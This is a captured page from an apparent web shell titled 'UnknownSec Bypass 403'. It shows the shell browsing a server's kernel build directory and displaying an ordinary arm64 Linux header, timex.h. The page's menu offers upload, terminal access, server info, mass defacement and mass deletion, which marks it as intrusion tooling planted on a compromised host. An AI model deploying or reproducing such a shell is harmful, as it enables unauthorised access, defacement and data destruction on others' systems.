UnknownSec Bypass
403
:
/
lib
/
modules
/
5.11.0-1022-aws
/
build
/
arch
/
arm64
/
include
/
asm
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
timex.h
/* SPDX-License-Identifier: GPL-2.0-only */ /* * Copyright (C) 2012 ARM Ltd. */ #ifndef __ASM_TIMEX_H #define __ASM_TIMEX_H #include <asm/arch_timer.h> /* * Use the current timer as a cycle counter since this is what we use for * the delay loop. */ #define get_cycles() arch_timer_read_counter() #include <asm-generic/timex.h> #endif
Copyright © 2025 - UnknownSec